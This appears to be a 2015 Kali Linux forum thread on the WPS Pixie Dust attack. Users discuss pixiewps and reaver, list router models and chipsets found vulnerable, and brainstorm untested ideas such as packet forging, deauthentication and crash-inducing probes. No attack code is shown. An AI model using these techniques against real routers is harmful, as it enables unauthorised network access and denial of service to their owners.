@nuroo already checked, completely unavailable, only way to get it is dump a live device. Same with the xfinity arris routers, found on a website that the firmware is "closely guarded".
@nuroo already checked, completely unavailable, only way to get it is dump a live device. Same with the xfinity arris routers, found on a website that the firmware is "closely guarded".
I am trying my best to figure this out, I have been testing on a broadcom and zyxel router, It never spits out the 2 hashes for them, am I missing something simple here? Of course you need the 2 hashes to get the pin. It spits out the other necessary keys/info. My kali was updated this evening. Edit-I figure its because router is not supported.
Last edited by undersc0re; 2015-05-05 at 15:49.
so then guys & gals....
WPS blackjack attack next?
http://xn--mric-bpa.fr/blog/blackjack.html
Wps Pixie Dust Attack is VULNERABLE for all ZTE modems...
The person who prepared this attack(blackjack) is a bit confused how things work.
First RS-1 is a random value generated by the Registrar, and it is different from ES-1
ES-1 remains unknown.
The generation of the registrar R-Hash1 has always been known.
What the author is confusing about this PSK1 and on the data traveling on the WPS protocol, the ES-1 and ES-2 are never sent to the registrar
The R-Hash1 is generated with PSK1 the registrar using a RS-1 Random number generated by registrar.
A check of R-Hash1 is made by the Enrollee but using the Enrollee PSK1, the Enrollee PSK1 is correct.
Then the Enrollee R-Hash1 will be different from the registrar R-Hash1 because PSK1 is different, and if you have to check all 11,000 possibilities, then you are doing what the reaver does, which is to test all known pin.
It is not possible to repeat the message M4 indefinitely because there is a protocol to be followed, it is necessary to go through M1 M2 M3 to then send the M4, then it is the same thing as reaver is to test all pins.
Apparently the author was confused where the keys will and who checks them.
The author of this error here
"The Enrollee sens the first secret nonce, E-S1. The Register knows if the Enrollee knows the first half of the PIN."
This is is done on the contrary, Register sends the R-S1 and the enrolle know if the registrar knows the first half of the pin
Another error in the functioning of things
"Pixie Dust attack blah blah, we have to pretend que the Register crates predictable random number."
The random number is generated in the registrar, the registrar in this case is Linux Kali. How will you generate a random number which you already know him? It has much wrong this article
Last edited by t6_x; 2015-05-05 at 15:54.
... and according to my Jedi skills there are no "gals" here. If there are, please someone introduce me!
Welcome some1, to the new Kali Kitchen (thanks g0tmilk), where strange things are cooked and weird things happen. Cheers!!!
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Haha I love that ^^ Anyways, I need some help from some of you really smart experienced guys out there. I still have a lot of homework to do with the topic but I was looking into tkiptun-ng... more specifically injecting "arbitrary packets." Does anyone know what kind of stuff we can inject? I'm wondering is we can somehow maybe magically with a little bit of "pixie dust" initialize PBC or something similar? I'm really not sure, just thinking
The author knows he was wrong, right at the top of the page it says:
Erratum : I thought the Enrollee was the client, and the Registrar the AP (see spec :
Enrollee: A Device seeking to join a WLAN Domain. Once an Enrollee obtains a valid credential, it becomes a Member.
Registrar: An entity with the authority to issue and revoke Domain Credentials. A Registrar may be integrated into an AP, or it may be separate from the AP. A Registrar may not have WLAN capability. A given Domain may have multiple Registrars.
, but I was wrong. Thus, what I wrote below contains errors. Correction and implementation are left as an exercise to the reader.
Love that we have our own little "kitchen" now
So anyways, is anyone familiar with tkiptun-ng and packetforge-ng?
Like send it malformed packets and make it trigger a PBC? That's an interesting idea. I remember a while ago i was doing some packet maniulation scripting and i found scapy to be VERY useful for the project i was doing. Probably be a good tool to use for that.
You took the words right out of my mouth, thats exactly what I was thinking. I actually had 3 ideas.
1: Trigger PBC
2: Trigger AP to accept a client's WPS pin
3: Send an M8 packet to attempt to reconfigure the AP
I'm not so sure that any of these ideas will work since I'm no super hacker or programmer, but it is just something I see possible
Also, there has been updates to tkiptun-ng: http://download.aircrack-ng.org/wiki...kip_master.pdf
Last edited by soxrok2212; 2015-05-05 at 21:10.
Hrm, that gave me an idea. I can hook up to a router(uart, spi sniffing, or whatever) and see what goes on inside the router during a wps transaction. See if there is anything exploitable.
Yeah, a reset would be excellent. I've been trying a bunch of ways but haven't been successful. I've been thinking about probing an AP hundreds of times per second with invalid characters in order to reset it... haven't been able to try that yet (MDK3 doesn't support this operation... yet )
never a dull moment..
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
If the knoppix-std forum was still up, I could direct you to the script i wrote that used scapy. Wasn't much, it just watched an ap, and dynamically disassoc/deauthed any clients that tried to connect to the ap that weren't on the "whitelist", sort of an active ap protection. Wish i still had a copy of it so i could see how i did it :-/
Oh well, off to do my favorive thing, hardware hacking!
If i come up with anything usefull, I'll start a new thread to hopefully get some R&D into it :-D
Nope, it was a straight up DOS, it could be set up to protect an AP from any unknown clients, or set up to deny a specified client(s) from assoc/auth to any AP I could see.
More or less it was just used to either protect an AP, or just troll someone ;-)
Last edited by aanarchyy; 2015-05-05 at 23:50.
Ah interesting. Well theres really 3 things on my mind right now.
1: Have t6_x's Reaver print PKE, PKR all that stuff with -vvv (as well as sending M1, M2, etc). I've already contacted him about that, hopefully we will see it soon
2: Get someone who knows C (or who can modify MDK3) and try to probe an AP with invalid SSID characters to try to reset/reboot the AP.
3: Figure out how to forge a packet that could possibly open up an opportunity for one (or more) of the 3 things I listed earlier on APs configured with WPA+TKIP or WPA+WPA2 TKIP+CCMP
Thats basically my agenda... if anyone wants to assist me that would be great
Last edited by soxrok2212; 2015-05-06 at 02:49.
As said earlier, probably best to open a new thread about this, as it is not really pixie related. Put all your ideas in the OP and everyone can collectively(hopefully) make something of it.
But for now, im still poking at this effin router to make it do something interesting D-:<
Last edited by aanarchyy; 2015-05-06 at 00:04.
Just a quick note on the original post, DH Keys are not calculated with a PRNG, its modular arithmetic with the function described below... I updated that. Sorry for the confusion.
I also forgot to note, MediaTek is vulnerable too! Same problem as Ralink (since MediaTek took over Ralink a few years ago.)
Hay #soxrok2212 ..Thanks for pixiewps 1.1 ..it works on TD5130 V 1 but TD5130 V 3 not works why?
Ok i will send you a handshake For TD5130 V 3 ..ok For add this realtek in pixiewps and reaver
Give my Your GMAIL pllz
lol.jpg
it keeps looping :S
Pixiwps is vulnerable if ES1=ES2 ...if not , invulnerable.. You can look all results...
Some manufacturer use really easy way to create PIN... Serial numbers , Ad-hoc or other..
They can create new -K options like -K 4 , -K 5 , -K 6 or -W 3 -W 4 ...
Pixiewps is great project .. User friendly , costumer friendly.....
I just checked the database and no broadcom units are vulnerable. I was sure someone posted that only some broadcoms are. Have there been any such cases?
#Saydamination .yes but i have a have handshake.cap ..i wil send to #soxrok2212 ..just give my your email plz
TRENDnet TEW-691GR - VULNERABLE
Pixie:
[+] Manufacturer: TRENDnet Technology, Corp.
[+] Model Name: TRENDnet Router
[+] Model Number: TEW-691GR
[+] Serial: 12345678
chipset, ralink RT3883
wikidevi
I added some thoughts about Atheros. Potentially the same thing goes for Broadcom... anyone have any ideas or comments?
@wn722
I'm glad u asked. I had the same question. Didn't realize main page updated.
@soxrof2212
I'll help test if u guys come up with something.
cheers. good on Atheros for keeping it safe.
why not use untwister to bruteforce the original seed and find the pin?
its available on github, its a seed "recovery" tool
The reason is because not supported routers use the /dev/urandom to generate the random numbers.
The Untwister, only supports basic PRNG of certain libraries (Glibc's, Mersenne Twister, PHP's MT-variant, Ruby's). These are simple and easy to crack PRNG.
But not supported routers use the /dev/urandom, which is safer and complicated to manage to find the seed.
as far as i can tell, only Atheros us /dev/random. Also Dominique boguard Clearly stated that these seeds could be found in seconds with a decent computer. which algorithm the prng uses is stated anywhere as far as i have read.
also Dominique pointed out that the seed was very low entropy, only 32 bits!!, its nothing impossible to crack in minutes with any home computer. the only reason we can't is because someone hasn't figured out how to write the code yet. Everything is literally written down for us in Boguard's Presentation....Literally....the only reason we're able to get the pin now is because we assume ES-1 = ES-2 = 0. which really not much of "hacking". the only problem we are facing now, is someone needs to know how to write a code to find the state of the PRNG, once that's found we generate random numbers, hash the result with hmac_sha-256. and then simply compare the results to what the router gave us. once we see they are the same, we know we have the correct seed, from that we can find ES-1 and ES-2 (im using broadcom as an exemple since it generates both nounces right after M1 message). This is by far the simplest thing, im honestly very surprised broadcom hasn't been cracked yet. its really not that complicated. Lets not forget Dominique Boguard was able to pwn every router out there. even Atheros with their "hard to crack" /dev/radom prng.
Where did you hear he could crack any router? I've been talking a lot with him and he has said that Atheros looked pretty secure. The thing with /dev/random is that it has external sources of entropy that with get increasingly more difficult to crack. It's not just find the seed and we're done, it's a whole lot more complicated than that
Interesting reading on this thread.....
Here's another router
Linksys WRT110
Vulnerable
[P] WPS Manufacturer: Linksys Inc.
[P] WPS Model Name: Linksys Wireless Router
[P] WPS Model Number: WRT110
[P] Access Point Serial Number: 12345678
CPU1: Ralink RT2780
wikidevi
Hello and thanks for the info.
The following router is vulnerable
https://wikidevi.com/wiki/Buffalo_WBMR-HP-GNCode:[P] WPS Manufacturer: BUFFALO INC. [P] WPS Model Name: WBMR-HP-GN [P] WPS Model Number: RT2860 [P] Access Point Serial Number: 12345678